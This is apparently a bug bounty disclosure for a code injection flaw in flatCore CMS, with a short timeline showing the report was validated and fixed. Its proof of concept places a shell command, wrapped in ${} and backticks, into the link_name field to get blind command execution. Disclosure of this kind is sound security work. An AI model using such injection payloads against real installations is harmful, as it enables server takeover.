Code Injection in flatcore/flatcore-cms


Reported on

Oct 13th 2021


Another code injection payload in link_name.

Proof of Concept

Insert into linkname

${`sleep 10`}

Go to http://[FLATCORE-IP]/flatCore-CMS/content/cache/cache_lastedit.php and see that the page has stopped for 10 seconds.

${} escapes the string, ` switches context to OS commands.


Blind RCE as admin user.


should clean permalinks too

We have contacted a member of the flatcore/flatcore-cms team and are waiting to hear back 2 years ago
haxatron modified the report
2 years ago
Patrick validated this vulnerability 2 years ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrick marked this as fixed with commit 2cb02c 2 years ago
Patrick has been awarded the fix bounty
This vulnerability will not receive a CVE
functions.php#L389L397 has been validated
to join this conversation